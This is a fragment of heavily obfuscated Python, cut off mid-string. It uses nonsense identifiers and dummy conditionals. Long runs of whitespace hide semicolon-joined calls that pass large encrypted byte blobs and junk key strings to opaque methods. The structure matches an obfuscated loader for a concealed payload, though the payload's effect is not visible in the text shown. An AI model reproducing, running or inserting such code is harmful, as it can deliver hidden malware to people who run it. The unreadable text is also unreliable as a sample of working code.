            _power._walk(_hypothesis = 82580 - _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='XWXWWXWXXWWWXWWWWXWWXWW',Round=b'\x12\x0f\x94\xda\xec\xdaqP\x04\xe1\xd8\x06Z\xcdOm\xad\xe6\x9b\xea\xb6\xc4:\xb3i\xd8u\xc5N\x141\xd7\x16\xf1\x12\x19\xb6\xa2\x84\xb7\x88\x9f\x88\xb6\x0f\x87\x83\xeaH[D\xd0\tJ\xcf\x96<,\x895\x17\x8b\x0f\xd7F\x06\xfa\x96\x87\xa5\xaa.\xd6w=\x7f\x07JK\x8cg\xeau\x02\xaf\xf1\x00^\xa3>\xbeN\x1c\xa3\x92mdr\xfes\xc1\ny\x18\xb6\xc7\xea5\xacHq(\xabY>p\xf1\xed\x87,\x1e!w\x05\xfc\x9d#:\xf3|\x88\xc2\xcf6\xf0`D]\xb2\x9b\xb8\xaf\xe1\xc1\x85\xd2\xfa\xe8\x82\x18\xa9\xd1\x07L\x90\xde\xe3\xb8\xfaRiK\xc2\x99\x08W\x92\xa1\\\xecf"p\xc5\x96p\xb6\xa9\xee\x16\xb9C\x1a\xea\x7f\x10\xb3\xd9K\x13u\xf3\']\xc5o\xda\x06\xa0\xd5\x1d?o2r\xab\x19\xb6\xbcz\xd0\xd2A\xeb\x86C\xe8\x8c;\x98>\x85\x95\t\xa0\x14\xe9\x1f\x10\x1d]*m\xc9\xf3\xb6\xca\xcc,n\\\xdc\xb6<o\x9b\xea\xc6\xed\x13B\x00 ,\x84\xa9\xe8c\\\x9f?\xa1\xf2\xa2\xe5\x02\xc4\xeb!\xcaZ`\xcd\x07q\xc1\x06_U\xb7\xee\\Q\xcd\xabN<a\xf4\xff\x00y\xa4\xdb\xb9\xbb\xbeu\xc26\x81\x92\xa4\xa5\xb2#g6\xd5m%r\x06\xf8r`Q\xf1\x91\xcd,\x02\xfe\xf0\x8f1\xa6\xf7\x8a\x10m\x16\xd4\xe7Yi\x8b\xf6b\x97(\xc9\xaa\x9b\xc9I\xf8\x98B\xe4\xb5>\x8fH\x9bg\xb9wi\xc4\'\xa2&\xc8Z\x87\xac\xdbC\xe0l\x1a\xb6A\xb7-\xc6Z\x91\xd0e \xda3Q\xcfrsn\xaa\xeb\xde\xc8\xdb\x99,[\\\xc0\xcbf^{Ywl\xf4\x1d\xa8~4M \xf9x\xbf+\xd1&\x1aEc\xf5\x1cqP\x01xEF\xf8J\xcf1\x7f\x1aq\xc9\x81\x11U\x1c\xc11\x1e\xe9 x4\xc8iyHSKW\xb6\x91\xa2\x19\xb2(\xcf\x169E\xdd9?5\x96\xa2oMDv\xa0\x99\x8d}\xaeS\xb7\x0e\xc4\xa5\xaa\x0b\x81\x84\xb1\x98Sbj\xca\x1b8o%\x86%\x8e\x8d\xbdM\x9bSb\xc3<\xd8\xb3\xf0\xddU\xf5\x0e\x12\x1cWu\xc4B {\xf1\xb9\x03\xec\x809,?\xb3\xdf4\xa0ll\xecM=\xa5\xa6\xb0Z\x067+\x19,7\xad)\xf9a\x94W\x16\xf3+\x8aC\x12+k5q\xe9i7\xfet\xf1\xaa\x1b\xff\xba\xed\x81w\xb7r$\xa1\x9a&\x9b\xae\x14L\xb3\xad\xf3N\xd2\xe7\x9a.vb\xab\xa1t\xbf\x03N\xbf\x0b\xb6\x9b\xa0\\\xda\xb5K@h\x08\x05\x07*`(\x89\xc0\xe9Y\xfc\xc3U\xf5:K\x06d\x13\xaf\xa5\r\xd3oU\xf6\\!\xe42@\xad\xb1\x05\xd6r\x9c\x88\xa2#\x82\xaa<1U\xd9F\xcd\xdf\xbd\xfd\xeb<\xb2\x982\x18V\xbdo\xcbS\xe5\xb0\x13\xc7G\xc0\xc3\xc7\x8e\xca\x12\x9b\xa9o\xa9\\Uu\xd1\xd7\xdf]\x14W{\x12\xe7\x11%\x15\x85P\xae\x0b`\xff\xbe\x80x\xae\x9a\x99\x1d\xdel\n\x8d\r\xfd}\x02T\x83\xa8\xbbq\x0c\x95\xcb4B&\xddJ\xa2\xd3\x05\x89C\x93R\xb0\x80\x9b\xd3%N\xb1\xc5\xce"\ts\x03;i..\xc9-I\xdbz,YZ\x83\x1d\x12aGTn\xaa\xeb\x1a8\x9f\nke\x9e\xb3\xb2`\x16h\xe8\xfe\x1a"\xa3{6\xa4\xdcn\xc0\xec\xae\n\xda08\xd9\x91L\xc2\xaen\'4@\xc1\xc2B9m\xaa\xdb\x01\xae\xbe\xe38\x7f;"|`m\x8d\xb4(2v\x19\xf9\xae#\x19$\xbd\x84\xd8\xea\xe5N\xd0\x9ac\x9c\xfb\xeb\xea\x86q\xfd\xf5i\x03c=$\x17\xe0?4\x83\xb6\xd2\x13;\x0b!k\x07\xa2~D\xdb\x18+F\x92\x0e>\x0f\xa7!4\xa4H&L\xe1\x92\xf2\xadam\x9b66\xd5\xads\xbe\x95\xe6\x9b\xc5\x03q\x8f\xa0\x1dg\xf1P?\x1bl\xe5e\x16\xa3\xedu~\xd5\xd8\x80_\xc2\x02\x11BU]\xe7y&\xbaP8tx\x88!#4\x96\x9b\xbc\x1d\xc79\x1d\xa1{\x93\xc7*zI\xd7\xa6\x8e\xb4i\x12t\rN\xfc*n\xff\x96\xc0$\x12O/6\x03\xcd\xf0\xc1\xcbz\xdf\x02\x93l\xaa\xeb<\x1e\xd5\xe2:p\x077$\xdf\t=\x06\xfcN~\x94\x11>t\xe9\xe1\x80E*\xafW\x07\x03\x16\xe2\x8a\xcc\xb6\xe3`AWq\xdc\x1c\x84{\xc3k2|h\xc9B D\n"a\x89\xc6!\xd1\x8a6\xd1\xde\xa6\xba\xce5\x12+\x94\xb7\x99\xde\x81\x98\r`\x03\xa3%\x19\x01\x1c\xb0@\xb7\xd0\xa8\x1d\x12\x83u8\xb28%\xb0$\t\x16\xdd^\xf4~\xd1\xf7\xdf:\xde\xb2\xf2\x1a\xc9\xc7<\xb2^ii\x1d\xf1\xaci\xbc\xd1\xea\xd5\xe1\x0c\x82\xbe\x04u?\xa7J\t\xbbwJ{6\xd6\x8f\x91V\x01m\xaa0\tOr\xc9Q\xdd\xae\x05\x07C\x882\x0e!\x82\xb7\xc3\xd1[T\x1f\x1f$\xd0\xcfg\xc8w\xd4\xac\x1d\xf0\xf0xX:2m.j\xb3Xme\xb1n\xcbLj\xdbaD(\xeb[\x82Z\xb0\xc6f\xb3\xaenM\x9bMs\x8bu8r7-Y\xbaL\x9a\xd3i\xd24-\xe89}\x97\x01\xf0N\x04\x1bJ\xdb\x85\xaf?\xb7H\xde\xd5\xd5pu7\x0e\xdaO\xd3\x19\x16\x842\x9b\xf7\xd0N\x10\xb7\xa9\xee\xb6\x8co\x1bH{\xf9\xee\x12\xaa\x12Q\x96\x87$cE\xaaI\x92i\x1a\xb5\x89\x85\x03\x165\xe0\xa3],X\xfc|h\x83\x8cN"\xe3\xc5"\x1aY\xf3\xa3XM\xa3B\x14}U]\xe7\xa1\xae\xdaZ\xd9\xd8\x83\x80\t_!p\x06\x93\xbf\xc2c\x8b\x10\x1awYF\xdb\x84O\xd8L?9\xda,1[Z\x10\x8aMu\xb7\x8c\x93y\x0b\xc0\xe4\xaacHD\xa5\x89\xab\xa4\xa7)\x17u\x85\xbe?\x0cA\xb6\xf2\x8a#\x0c\x1dV\x7f\xc9\xccV\xc0\xe03\x95\xb9\x0cd\xd6\xb1On\x89a\n\x06\x9bB\xf86\x7fw\x00\xa0\x91\xa5>\x06\x1d\xa1&\xf6w\xafL\xaeo\x035\x7f\x84\xc9\xe0(\'\x9cN\xf0\xdd\xd2|*+\x9dh\x0cb\xd5\x92\xd5\xafo\xcd\xa7\x9b\xea:7\x15\x07\xd3\xb4\x9f\x8c\xd3\xd0%\x88R"\xd3)\x06\x9d\x8c=f^\xa5\x19\xd5<\x9c\xce1\x01\xe8\x19\xa0[Da\x1c\x05~0\n\xfc(A\x9dc\xa2\xb6z \x8e%\x83X\xcd\xb2i\x90\xc6)\xa1\x13fI\x94\xc6I\xd8\x14\xear\xa4\xc1\xb9\xc1\xf6\xf8\xcb\x04sOC\x82A\xe0\xe2\x0e \x8b\xf0GJ?X(=\xb0A\xdd\x01)\x89\xf1b\x99\xa4i\xc5\xbc\x13.}Z\xed\xf0\xfd\x1ce\x08 \xa0\xc8)\x84\xb3\xf8\x00i\xf1\xeb\xa6\xbco\xf3\x8e7\x98m|\x87\xb6\x0c\x1bCo\xdb5\xb4\xd7\xd6\x19\xda\xc4\xdf\xc2*\xd04\t^\xde:c\xdbkrq\x05\x87\xe3t;"k\xea\xf9\x90\xe8\x99\x98\xa9I\xbd\xb7\xd0\xb1\x85\xb1[\xe0\x086\xf0J\x14\xd3\xc0\x82\x01m\xaa\xfb\xe6\x07\xc8\xd1\x10\xe7\x085?d\x00~\x83\xa9\xa2\xe6\x04\x01\x81\xe6\x98o\x96\xd3i`v\x80\x8f\x10h^*m\xc9\xb0d{\xfd\xc4H4\xb0t\xc9\x81eX\xdaT\xb7n\xa2\x8d7\xbeV\xa1\x9c\x14\x89\xcb\x8b\xb5.,\x89\xb4\x0eFZ\x98K\x19\xa9UA[\x1d\xf1\n\xb2\\`\xd6\x0b\xf8\xbfx\xdb~\x02\xb1\xf9k&\xfb\xd8 c5C]!v\xad\xaan\xcdd\x01\xcd\xd5\xa34M\x10\x9c\xdd4P\xe8\xb3D\x90q\xc4P\x10\xb4\x05R\xee\xd2{\x1d@tX\xe3\xa6\xa0\xeb\xd7\xfc\xa4\xb5\xc5\xf5\xadly\xc4}\xd0\xc7(\xaa\x00\xe5\xf8D\xfd")\x97\xb6\x84\xca\xb0{\xa7\xc0\x12\xc5\xcbeGf\xd6\xa9\xdbY\xd8TK\xd9w\xbe~1$b\x02\x11\xabM\x08\xd3&\x8d\x9d,b\xa9\xd5\xa06\x01mT\x00WV\xd5\xdd\xc2\x15\xb9\xb3\x88\xab\xdd\x9e\x96\x11X\x16_\xe1\tI\n\x0bvU\xdd:\x86\xe2]\xe3\xc2\xd2\xb8\x9c/\xc1\xbc\xf7s\xa5\x0e\x19\xcb\x9c85\xf1XK>\xce\x12\xb7\xf1\xef\xad\xf96\xc3=Y\x18w\x17\xbc\xcc\x9f6\xee\xb3\xf0%\xc6\xf0\xe80p9G\x16\xc0\x9e\xb7\xda@\xd8\x0fb\x13\xc4\xa2M\x99b\xa6\xd4b\xb8\xd1\xa56\xd5ul\xda\xdc\xaa;o\xce\xbf\xa79O\x99\x89\xb2\x15`\xb10 \xdb\x91)v\xf4\xc9\xa0\xc0\x94\xbc\xae\x9e\xf3,J]y\x9fr\x16\x8dUi\x18\x1c"\xea[\xa29\xc2\xc9\x99<2zvn\x85\x94EV\xd4\xd0\x1aK\x12P&v\x8b\xd8\x12\xdd6\xd5\xad\xe9\xaa\xd5\xf4\x12C\xe6o\x1a\x92\xed\x11\x19\x9c\xd0\xda\xe0\xefB1!H}N\xe1A\xf4|-\xc9V\x82>\xb1g\x1c\xad\x8eY\xea[\x9d\xba\xaes\xbd\xe5\xf8\x00\x1a[\x7fh[f\x7f\xae\xd0\x06\x9a[&s[\xb4\xd3\x9dN&yK+\xdeT\xd7y\xb36nJ\xda\x1d\xee\x95\xe5-\xf5t\xa0\xffm\xec\xcdb`\x90\xb0\xdd\x81\xd5\xacE\xc2\xebMu\xbb\x89\x11w\x80k\xaa\\4\xec\x90+\xdb0n\x99\xfe\xade\xc4\xa9q\xbc+f\xb7R\xbe\xa2\xb4\xb0X\xf6\xf3\xad\xe2\xf0\x8a\x01Q\x0c!\xdc\x91\xe3D\xda\x96Q\x94!)\xda(\x9a\xffD2\xbb3g\x8f\xf8\x04Bk\\\x89\xaf@\xe8@\xa3\x02d\xaa\xaan\x1d\xed\xbd\x9a\xe0\xf6\xcb\x97B6\xac\xb6r\xc7\x89\xc2n\'E\xd5\x96\x1fK>\xadS\xb7\x03\x19\xb5\x15\x0b\x119\xe9u.\xa2\xb6\x12\x11\xd9\x04\x0b\x03\xab\'\xc8\x0c\x8d\xb1\xc1\x96\xb8\xbf\xa9\xee\xef*\x02\xc8\xe4\xaf\xca\xf3l\x15s\\9\xcfi\x15&}Tt&.\x93/\x89\x13\x87\xa0v\x1a`\x97\x9f\xd9\x1c\xda\x1a\xba\xe5p1@\x1frn\xf1ukX\xa1\xd3kMC\x97\x99\x11r\x0c\xaa6\xa3\xaa\x9dS\xcf%\xa3jk@\xc2\xb9D)B\xfem\xf5_3\xeb6pq\x07\xe8\x1b\x8e\x11\x81\x14\x01\x07\x9c\xfa\x85\x8f\x84\xe4\xb9\xd2\xc3\xc3%u\x84\xb7\x9dX\xa9\t\xedW\x9dJ\xa8F\xf7\xe1\xeb\xe2\x7f\xf8\xe0>\xa3\xe6\x91\x98\x18\xe9\xab-\xac\x8c{%\xea>\x80\x1e\xa1s\xf4\x08:\xd2&\xbf\xca\xbfGN\xf1\xd8\xdd\\\xab\\\xa7\x98\xdcml\xa8\xd3\xb0\xdfnH\n\xad\x05\xc2\xa6\xe2\xb6S\xb1\xday7\x0e\x07\xb7Uu\xb4"\x1a\xad')

        if 149856 > 6758216:
            _power._system(Modulo = _power.Calculate / -97884)
        elif 435356 < 7265630:
            _floor(_add = -48657 / 98953)._walk(_hypothesis = 67296 - _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='ILJJIIILIJLILJLJI',Round=b'\xa0\x94\xe7\x14s\x87\xf1\x04y\xd5\xb4\x99^\xc0\x89\x04\x87\x98I\xe7<\x1b\x9e\xd7\x8e\x02\x82\xec\x06\x11b\xa8\x82\xbb\x04\xb3\x1c\x00\xae**\x97v\xed\x87\xde%\xcfA#\x9d\x02\xecB\xc1\x04\xfc\xa2MAE\x97W\xb8\xe8\x01\xb0\xe8\xea\xea\n>]\x01\xc4\xe8\xf2\x90P*\x16K\x8b\x1f\xb3$\x9e\xa6@@\xd1\x98f\x8b\xc0;\x0c4\x0f0\xb3.\xbe\xb5d\x92L,\x05U\\\n}K\xff\x1fX&\xc9Mu]\xdb\x05\xda\x13\x92-0\x10\xb7im\xd3\xc0\xbe\xc2w\xbb\x1e\xe0\x9d\xac\xa8i\x8e\xf0\xb7\x1f\xe7s\xfb\x1e`:\xba\xa3!\xf9\xd6\xe0\x1f"L[\xc1\xf4\x8b\xcfX\x90\xb3v\xfaBa\xdf-\xfa\x97\xab\xea:\xb7\xdf5\xe598\x1a\x025\x07,\xd2C\xc2\x8f\x9f\xab\xbf\x9a rX\xa4AM\x85Tt!\xa6!\xc2DD\x1f\xa2ri\xdd\x1dF\x88\x9b\x06\xbc\xf4\x00\xb3\x1b\xf50mW\\.\xdd\x8ff\\\x83\x9d\x00\x05\x14J\xc4\x04b\xca\x00A\x89I\xbe\xac\xbe\x9d\x00\xf0\x8c1#\xc8\xa1)C\xb4\x13\xa4\xc5\xd2\xaeUHY\x8a\xc41)h\x7f\xf1\xa4\xd9\xc4\xb9u\xea\xb6\xc9p\x00\xa1\xfcH\xe8\xf8@y9\x1e\xb60\xcc\xec%\x9a\xdcA?\xac\x9e\x85\xbb\xa5\xa9"p\x98\x89\x8a\xd6\xe6\xda\xc8\xb1\xa6\xda\x166\x05\x8exu\x81D\xe5\x97\xea\xff\xb2\xae\xbcL\xc9@a|&\x98\xa9\xb3\x8f\x08\xe5\xb0X\xb67\x8b\x0e\xef\xbf[\xfb\x17\xf2\x8e\x10\xb9\x0c\xbc\xbc\xd6\xa7\x1fiw\xf6\x12\x94\xad\xce#\x1f\x1b\x04\x8bo\xe1\x03\xea\xd4\xed\xc8\x90\xe6:\x8c&\xe7\xf7/\x1a\x1d\xecP\xb9z\xe6\x87\xfdt/\xe9V\xd8\xb50}`\xdd\xde\x05yA\x03\x1c\x96\x01&W$\x83CZ.\xad\xdd]q\xa4\x0fx\xa4\xc3\x0e\x02h\x9eriKH\xa3\xd0Z`\xed\xd8\x1a\xc1@\xf6\x0b\x04\xcbUuk\xc2L\xeb\xc9D0nk^$H\x80$\xdd\x04(\xdf\x0c\xd4LI\x12`\xa9tO+\xef\xeeT\x86\x03\x9b\r\xd8v\xcf\xca\xabC\x1e\x14\xe6\xe8L\xa3\xc0Olw-\xb4\xc0\x04L\'X\x83h\xee&\xea\xdcz\xf0Y}\x13\xe27a2P\xf5\xa7N\xfd9\xd3\x02A\xec4G\x1dk\x7fr\xc81\xd2~\x1e\xe5\xaf\x0c}\xb6\xb0\xd0j\x16s"\x8f\xee3\x91k\xad9\xa0\xf3|;2\xd3\x89\x96n\xc7\xc1\n\xb9ZX\x98\x15\xab\xea\xd6\xe4c\xdf\xa8\xa2\x98\xac\xda\x84\x8a\xa7\xf8\xaa\xba\xdd\xa2\xcd)\xedm\x98r\xaa\x8ed\x99\xa8\xca\x91Hv\xbc\x92K\xb4^\x8ah\xb9\x14\xddz\xcd&\x84\x9b\x1b\xcb\xfbK\xdf\xd6\xceZ\xf5Fn|\x12\xf5\xa21\x04i9\x07\xa7\x96\xff\xb4P\xea\xd0\xff\x05\xd6\xd8\x86\x99\x02\x8e\xd0\xfc\x809\xc8\x17\xf0G\xa4\x82m%\x08-f\xc7\x90\xa0\x16\xc1,G\x15\x994\x8au\x9d\'\xd1i\xcd\x91 |\x95\x98\x16\x1c\t,\xb7\x12\xefA\xaeL\xd1z\x08\x11\xc2\x01h\xe0,W\x16J\x0f\x0ca\xd1\xbe\xcc"\xf8\xcd\xc0\xc4\xb2\xbb\x08\xe1\xaelA\xf1{\xd9\xd9\x85\xd2\xd8\x04\xf4\xda\xc0\xcf:u\xb7B?q\xe8\xce\xd5\xc5\xe5\xd5%9K\x99\x8a\xe1tm\xabm\x8c\x9e\xe6\xa0i\x89\x84S/\x074\xe7\xb7\x85\x12\xf6\xc9_\x03DL\x19&\x19\xc3\x04c\xdd\x0f\xb8\xb7!\xf5\x1c-\xe9\x8f\x0f\xc4\xf1o\xcb\xbaao@=\xd3c\xc0`\xc2\xee\x00P\x95\xfb\xe5\xd2\x16ZX\xd6\x0c\x1b\xb4.T\xa6B\xf4\x9d\x16\xb2\xb9T\xd5\xdd\x82\xe0\xa3\xc1\xdd2\xd4\x98\x93V\xf9\x82y!b\xfed\xb2h\xd66cn\xe5\xd4\x0e\x19\xea\x02\x94\x161\xf9\x96\xd0\xc3V*ur\xf4\xed\xfc!j%\xed\xa3w\x8e\x1c^\t\x9ejP.mi}\x08\xad.&\xf1\x13\x12=\x97XkCU\xbdx{\xe6\xdd7\xac\xef\xb6l\xcf:b~1\xf6\r\xab\xad\x96&\x12\xdb\x058\xb0\xb6\x05\xe5\x12Y\x13\xc9\xa6\xba\xee\x05\xd86\xa7\xfc\xafV\xaa-#\x118!Si\x97\xeeZt\x89b<\x96\xcc\xe7~\x81\x9eu]\xdd\x96\xd3\x16\xef\xcf\x0b\xdb$\xc5\xcb\x88S\x8a\x8f8\xb9\xb8\xbc\x93]x\xa0\x93\xbc\x8c\\f\xfb\xec\x0e\x9b\x9d\xb7r\xdbAK&T\xc9iB\x9b.\x8dUy\x9c\x95m\xa6*\x1a\xae\\\xda0\xc2p\x14\x8f\xd5\x83u\xc34\xc4O~\x1a\'\x01\xf60\xfc\x8cA\xa0!\xa0|)\xf48l\x98\xf8\xee\x88O\x95\xcf\x11\xcf\xf6\x00\x96\xc0\x16\xd3\x8d\x00H)E\x07_rGTd!\xba\xfcJ\xa5{2\xd37\xc9Z(\xd9\t\xed\xac[\x03\xce\xc9\xe5\xd0u\x95gz\x88S\xb0$\xa9\x0eK\xce\xac\xa6\xbc\x0fh~\xbd\xb9!\xa3\xac\xda8 \x9d\xbc\x13\xd4h\x91\xdd\x7f\x05\xe3\xbfx\xe7\xdc%p\xec\x00\xfa`\xe2MLHb1@\xd1aHb\xbb\t\xd7\xf4\xa1\x96\xfa\xb9\x85Qa+\x95\xaf\x8f\x88\x08\xc44\x02(\x13\x10\x12\xea\x17\x83r\xe96\xf8O\xf0\xf2\x87\x88\x91\xe8Y\xf8\xcfB\xe9\x81\x80\xc2\xdb0\xef:\xe0\xc3c\xa3\x13\xfe\xd3\xfb[\xe3\xc2\xdb\xd4(-\xdb\xbc\xb5\xcc\x82\xe2\x0b\t/\x87\xb4\x18\xb8\xe8%\x95\x0bC.\xc1M\xb4\x8ar\xd9y\xe2\x9b\x8e\x88\xa5M\xd4\xbd\x0e!\x95\xd0\xcb\xc8\n9=\x1cPJ\xf5Bh/\x81vd\xbe\x1d\x8c\xe9\xee\x9e\x06\xd3\x04T\x94^:P[ \xf95\r@\xfcl\xc2\x8e$\xfah\xdf\x96\xd2\xca\x19\xa3o\xd9M\x84\x7fN\x8c\x98I\x9c\x07\xf2\xd5\xa9\xdb"\x90\xaf\xfa\xceE\xea\xcea$\x1e\x80\xc8\xee\x1d\x1a\x13&\xfa1\xe5\xa7\xd96%\\\xee\xb2\xa7\xaa\xab\xed7\xd5A6\\\xe94w}\xf4y\xda\xc1\xd5u\xa2\\\x14\x18\xc8\xec\xe0\xe7\x95\xccdo\xffj\x8f\x04\xae\x8ctR\xdb\xb03\x82\xf7\x04\xd0\x0712\x97\'\xe8\xba#\xefI\xa9\xb4\xeb\x19I\x18\xb7\x04E"(\xf8\xbe5\xd3\xc4\x96\xc1~S\xdd-\x93\x1d6\x1a\xa1ykA++J\xa5\xbc`\x83X\'9 ++\xcc\x87#%\x1c\r\x81\xa4\x14\xbc\xf4CH\x98\x94\xa1\xc3\xfe\xa0|\xf5\xdd\x869Q\x826"\xe4\xb0\x89H\x8a\x9f]\xa7jk\xd5]\xa5\xbdT\xec\xb7"\xf8\xca!u\x02W\x10\x80\xca\x85{\xa0\x1f\xe3D<\x1c\xb6O\xc7\xa5W\xc7\x8d\xc1\x80S\xfaf\x14-\x8c\xd9\x1f1\xf3T}\xbbN\xc2\xd9\x90|\xdcJ\xd0P\x14\x97K\xeb/\x97\x10]\xdc\x83@\x90;\xb07\r\xee"\\.K\xa5o\x13\x10_k\xc5\x15\xf0\x9a\xe06\xc5\xe5=(`m6\xd5\xad\x03rh\x16\xb8\x91O\x0e[\x08\xe2x\xa3\xb1b\xd5\xd3\xb9\xe4\x94\x12\xaaA\x93\xe7\xc09\xfd^g\xdeJ\x9e\xa3\xc4#\xbd\xeaI>j\x97\x91I\xee\x8d8\xec\xa2Bg\xd5H\xbb\xaf\x06\xda\x815\x16\xf7\xd6\x01\tg\xd99\xe7\xfbCf%dX\x02d\xe5\x9b6mt\xcd\xab\xe24o\xa6\xe5\xcd\xcf?-V\x15w\xa3&\x9f\x8fW)9\x10\xbd\x871z\xf1,\x05r\xa4q0\x0e 5\n\xf6:\x89\x83W\xdf%\xa0\x10\xa5\xb1\x92\x86\xe0{\x1f\xe3\xfcB6\xdaD\xb9\xef\xad\x0c\xbf\tFD\xa8\xfdO\xd3\xb0\r~x\xba*\xba\x9e6r<\x1cL"\xd6#\x1a\xadJ\x8c\xc2D\xda\x19\x8aQ0r[h\x04I\x17%\x89b\x84\xf2X\x92\xc9\xc4\x16HkS\xdd\xa8>H\xebm\xacrGthz\x92\x13\x07\xce\xa2\x85f\xb5s\x80\x88|e\'-\x0c\xacf\xddT\xb7\xd7E\xb3\xc6J\xd6\x8f\xe3\xc6\x02\xff\xc3|\xb1x@^[x\xcc\xe1u>\xaf\x19\xc0\x04\xd29\t\xfc\x84^F\x16 \x94\xceK\xa5uw\x18 u\x0e\xb9\x95#\x14\xf0\xc1:\x16\x96K\x0fq\x9dj\x89\xa7D\xdd\xa2\x07xb\xe4\x19\xdc\xbf\x9a\x1eLwa\xc6\xfbE67\xbe/\x9d\xe5o\xcaG;\x16\xd9?\xd3\xd2\xb6\xc3P\xd7\xc0\x8f\xc7J\x8a(H\x0e\xe1(h\x9a\x89\x1d\x82\xa9\xae\x80H\x07\x13\xda^\x11\x9d\xceAY\x92\xba\xc2\x90\xda\xbc|y\xb92\xcd\x95:\xe4\x80m,\xe8pT\x8cp\xb0\xfc\xac\x1d\xa6\x193V2@j3\xa0A\xef\x7f\x04\x06\xb5R\xe9\xefQ\xd5y\x13+?\x92\xc2^\x11G\xec\xe5%\x8eX\xf5\xac\x8f\x80\xf5\x91)\xc7G\xb3\x1e8\xb5\xfa\x88\x80-\x95\xee\xa7\x95\x9b\x0c\x7fL\x14\xadT%\x97\x19=\xb4\x91\xd82\x15\xebO\x03\xfe^\x82\x05\\\xe6\xf4\xe8\x02\\:\xc8\xe7+1\x149\x1d\xe4,\x99\x06\xb3\xa8q\xa0\xb4@K\x90\xd3\x96\xf2]o\x91\xf5{O\xa2\x94X\x8a%B\xa7\x17\x9b\x908Q\nCK\xa3\xd9Tw\x1bR\x94\x8dh\xfb\xe0cm\xaa\xa8\xca\x8b\xec*\x01\xee\x80\x81\xf0#\xb62\x8e\xb4mQ\x9ec\x87v\xc5\x14\x98\xda\x1dZNs\xd1:\x86\xb3\xca\xfed\xbewi\x0f\x8f\xfdXI^\xea=j:h+\xafW;p\xc5]\x1b\xcdL6\x89\x84\xb3,\xc0w\xa1\xdf\xe4j\xb7\x8c\x0e\xddK\xcc\x9f\x98\x83$v/\x8dM\xee5MN^H]YU\xb7&\x11rM\xfa\xa4\xaf\xda\'\xcd\xf1\x94\x87dE\x8c\xb49\xd5r\x074&V\xc0G\xc6h\r\xbf\xae+\xa0\xb2EB\xeb^\xfa\xd6\xb6\xf6+Z~\xc8:u\xddg\x85\xb5y\x9a\xdcM\x8bc\xcb\x9d4\xc6i\x7f\xc0\x91Q#\xde\x1a\xb9\x94]\x9c8\xf8-N\x1d\xe4f%\x96\x9d\x96\xe0c\xc5L\xdc\x81\xd59\xc2\x823{S]\xd7\x9d\xa83=\xbf\x00\x0f\xcb\xbf\n|\xcc\x1d\xd7a\xbb1G\x80\x0597L\xfcu\x81b\x94\nM\x98JB4\xe2\x12\xc5yX,m\x11\xc9(\xeb\x92\x10\x04\t)\x04\xda\xed\x0b\xb8\x8a\xaa\xba[ \x19\x1b\xccir\x83\xc0\x9dG\xae\xb8^\x12%q\x12\xa9\x12\x08\xde\r\x13!\xe9L\xd4\'%\x88\xa5\x83\xa0\xe9z\x82\xde\xe4stM\x11\xe8\x07\x9cU-\xdd\x01\xa1j\x12\xa4\x8ad`\x96\x81\xdf\xb3\xee\xc0\xa6\xba\xae\x8d~m\x0f\x12$>\xc2f\x95\xd5\xfa\x80\x04\x97\xce\x83\x8c\xachy{')

        _floor(_add = -9047 * -96673)._walk(_hypothesis = 78805 / _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='NNNNNNNMMNNNNMNMN',Round=b'\xab\x18Y\xef\x10\x18\xae\xc6\x173\xe7\xb6\x11pG>o\xe1{j\xc5\xf5-\xeeE;[\xbcp;\x0b{i\xdf\x1aP\x9b\xea\xd6\x0c\x17\xa9\xd6n(H\xb3\x8f\xd6Z\x9a\xbf\xc1Y7(\x97\xee\xc1\x06X)E\x03?\x99\x92\x9eI\x80\xce@\x90\xde\x06VSy\x9e\x1a\xfd\x1e\xe7qzz=)$\x7fZW\xcf=\xdd\x8d\x06\xcc\xb6\x9b]\xab\xea\xa8\x85\xd8\x9dbd\xcf\xd4\x8a\xeeq\x19\xf3\xe2.\xb3\xd8%eZ\xc3\xa4k\xf0vY\xd7\xa0\xbe\xb1O\ttC\xfaKZxO\xac~\xb5\xa9nM2\xac\xbd;\xba\xcf)c\xd19e+Bd\xf2V2gk^\x9e\xd8D\xba\xa4q>\xeaE0\xb8"\xcd\xd4\xa9\xdb\x8d\x1fC\xcb\x93\xaa\xaf\xf7\x93\x01\x10\xbd\xa7M3\x0b~\xb5`\xb7\xccr^\xf7f\xc0b\x11`&\x94>BC\x94\xe0\xff\x11H\x0cK\xa5-\x99\xbeEt\xb4\x07B\x12[\x99\xbc,\xd3\xf7\xa6\xba5\'\xe3\xb7\xc1\xf3q\x04\x1e\xf7\xabK\xc9\xfb\x88o\xe0\x87\xaf{\xa3\xfa\x04\xb0\xe14\x0c\xf0\xda\xc7U\xbdTz`\x9e\xbdve|\xe0\x91\xa1o\xe0\xab\x9bV\xa8\xbd\xed\xc4\x8f\xd2\xf5\xc44"\xf2BX\xc8\xb6UU\xb7\xa6\xc7\xa6A\x97\xcd\xa5\x98P"t\xbfq\xeeRq\xb3\x05\xda\xd7\xb6\x07Vb\xc9\x94"FMQO\xed\xa0k{\xc2\xdfT\xb7\x9b\t?N\xa2$m,\xc2d \x10\xe32\x9b1\x8do\xe6\np>\xc0p\xd7\x10\x13\xe4\xe02\x80\x16\xa1$_\xd6\xd2\xb8\x8a\xe3|\x02\x9c\x81\xa5\x1c\xe1\xed*${\xac\xaa\xbb\xa5\x8f\xe3\r,\tV\xac\xb2\xb0T\xd7NC\x01\x19\x93z\x08\xbc\xec#\xae3fJ\xf5\xb4\\\xda\xc2\xbd\x12\x0c\xadD\x13\'\xd6\xe7^\x9c\xe7\xbd\xafS\xb7\x93\xa5;M\xdd\xa6H/\x12T\xd9)\xd2\rs\xc7[\x0f\xdeA\xc1\x04u#L\xafw\x05\xd8\xa3\x8b\xdab\t%\x19%h\x18\xa5\xe8\x02\xf91*\x97\xd6G\xa0\x81\x14\x03$S!\xb2\xf5I\x0e\xcfRi\xd7\xab\x8fL3b\x86\xb6i\xb5\xf5\xb2\xcfC\xa0N\xdd-(\xb8\x9b\x0bY\xb1\x12\xaf(\xbaD\xadF\x03\x87XZIQ\x97O_g\x93L\xe8o\xdd\x0f\x8c\xe4^)Y\x0e\xafV\x86\xb8y\xda\x9fd\x828\xa0\xb86\x1c\xfe0\x170X\xf8\x125\x95\xcb\xda\xb3\xc1\x00\x89\xef\tdH\x039A\xe1!(\x96\xb6\xe8\xcc\x901&0\x08;\x07\xc5\xa0\xe0\xcc\xa8\xaa\xbb\x85\xf8\xf0\x86\xee\x18\x18J\x01u\x00\x92!\x